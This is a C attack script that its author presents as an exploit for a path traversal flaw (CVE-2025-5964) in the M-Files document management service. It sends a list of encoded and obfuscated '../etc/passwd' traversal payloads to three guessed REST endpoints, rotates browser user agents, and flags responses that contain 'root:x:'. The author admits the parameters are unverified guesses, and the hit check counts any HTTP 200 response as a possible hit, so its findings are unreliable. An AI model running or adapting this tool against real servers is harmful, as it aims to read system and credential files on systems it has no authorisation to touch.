//Byte Reaper
//Telegrame : @ByteReaper0
//CVE : CVE‑2025‑5964 
//File Name : exploit.c 
//Des : path traversal
//Target Service  :  M-Files
//Version : 25.6.14925.0  
//Note :
//The parameters that I have put are just my own research and are not guaranteed to be the basis of the vulnerability because I was not able to obtain an account in the service and analyze it myself. 

//Therefore, all the parameters are just my own research in their documentation and on the Internet. 

//I hope that whoever finds a suspicious parameter or has an account in the service, 

//A free or paid version, contacts me on Telegram. This is my username @ByteReaper0.
//==> thank you.
//---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <curl/curl.h>
#include "argparse.h"

#define FULL_URL 2000
typedef struct 
{
	char *buffer;
	size_t len;
}Mem;

size_t writeF(void *ptr, size_t size, size_t nmemb, void *userdata) {
    size_t total = size * nmemb;
    Mem *m = (Mem *)userdata;
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp) return 0;
    m->buffer = tmp;
    memcpy(m->buffer + m->len, ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}
void agentSend(CURL *curl)
{
	char *a[] = 
	{
		"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9",
        "Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4",
        "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240",
        "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
        "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
	};
	static int c = 0;
	static int numAG = sizeof(a) / sizeof(a[0]);
	const char *send = a[c];
	c = (c + 1) % numAG;
	curl_easy_setopt(curl, CURLOPT_USERAGENT, send); 
}
void path(const char *url)
{

	CURL *curl = curl_easy_init();
	CURLcode res;
	
	if (curl == NULL)
	{
		printf("\e[1;31m[-] Error creating CURL object, Please Check your Connection !!\n");
		exit(1);
	}
	char *payloads[] = 
	{ 
	"../../../../../etc/passwd",
	"../../../../../etc/passwd%20",
	"..//..//..//..//..//etc//passwd",
	"./././././etc/passwd",
	"../\\../\\../\\../\\../\\etc/passwd",
	"..///\\..//\\..//\\..//\\..//\\etc//\\passwd",
	"../../../../../e.t.c/p.a.s.swd",
	"Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCAK",
	"..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
	"..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd"
	};

	const char *paths[] = 
	{ 
		"/REST/objects.aspx?q=", 
		"/REST/objects.aspx?o=",
		"/REST/objects.aspx?d=",
	};
	char full[FULL_URL];
	int num = sizeof(paths) / sizeof(paths[0]);
	int numPayload  = sizeof(payloads) / sizeof(payloads[0]);
	for (int i = 0; i < num; i++)
	{
		for (int p = 0; p < numPayload; p++)
		{
			if (curl)
			{
				snprintf(full, sizeof(full)
					,"%s%s%s",
					url,
					paths[i],
					payloads[p]);
				sleep(1);
				Mem response;
				response.buffer = malloc(1);
				response.len = 0;
				struct curl_slist *headers = NULL;
				headers = curl_slist_append(headers,
					"X-Requested-With: XMLHttpRequest");
				headers = curl_slist_append(headers,
				"Accept: */*");
				curl_easy_setopt(curl,
					CURLOPT_URL,
					full);
				agentSend(curl);
				curl_easy_setopt(curl,
					CURLOPT_HTTPHEADER,
					headers);
				curl_easy_setopt(curl,
					CURLOPT_FOLLOWLOCATION,
					1L);
				curl_easy_setopt(curl
					,CURLOPT_WRITEFUNCTION,
					writeF);
				curl_easy_setopt(curl,
					CURLOPT_WRITEDATA,
					&response);

				res = curl_easy_perform(curl);
				if (res == CURLE_OK)
				{
					printf("\e[1;34m[+] URL Test : %s\n",
						full);
					long httpCode = 0;
					printf("\e[1;36m[+] Request sent successfully\n");
					curl_easy_getinfo(curl,
						CURLINFO_RESPONSE_CODE,
						&httpCode);	
					printf("\e[1;32m=> HTTP CODE : %ld\n",
						httpCode);
					curl_slist_free_all(headers);
					if (httpCode == 200 || strstr(response.buffer, "root:x:") || strstr(response.buffer, "/bin/bash") || strstr(response.buffer, "nologin") || strstr(response.buffer, "admin"))
					{
						printf("\e[1;35m[!] Potential LFI hit – found 'root:' in response!\n");
					}
					printf("\e[0;37m---------------------------------------------------------------------------------------------------------------------------\n");
				}
				else 
				{
					fprintf(stderr, "[-] curl_easy_perform() failed: %s\n",
						curl_easy_strerror(res));
	    			curl_easy_cleanup(curl);
	    			exit(1);
				}
         	    free(response.buffer);
		    }
		}   

		
	}
	curl_easy_cleanup(curl); 
}


int main(int argc, const char **argv)
{

	const char *url = NULL;
	struct argparse_option options[] = 
	{
		OPT_HELP(),
		OPT_STRING('u', "url", &url, "Enter Target URL"),
		OPT_END()
	};
	printf(
		"\e[0;31m                 \n"
		" ▄▖▖▖▄▖▄▖▄▖▄▖▄▖  ▄▖▄▖▄▖▖▖\n"
		" ▌ ▌▌▙▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌▙▖▙▌\n"
		" ▙▖▚▘▙▖▙▖█▌▙▖▄▌  ▄▌▄▌▙▌ ▌\n"
        "     \e[1;30m        @ByteReaper0\n" 

	);
	printf("\e[1;34m\n[!] Reminder if you didn't read the code comments :\n");
	printf("\e[1;34m=> This is not a real exploit. I'm not sure of any parameters.\n");
	printf("\e[1;34m=> I just ran a search on the service's settings and analyzed them manually online.\n");
	printf("\e[1;34m=> I don't have a company to create an account with the service and analyze it myself.\n");
	printf("\e[1;34m=> Anyone who has an account or a trial version can contact me to modify the script and add other features.\n");
	printf("\e[0;37m---------------------------------------------------------------------------------------------------------------------------\n");

	struct argparse argparse;
	argparse_init(&argparse,
		options,
		NULL,
		0);
	argparse_parse(&argparse,
		argc,
		(const char **) argv);

	if (!url)
	{
		printf("\e[0;31m[-] Please Enter Target URL !\n");
		printf("\e[1;36m[+] Example: ./CVE‑2025‑5964  -u http://target.com\n");
		exit(1);
	}
	path(url);
	return 0;
}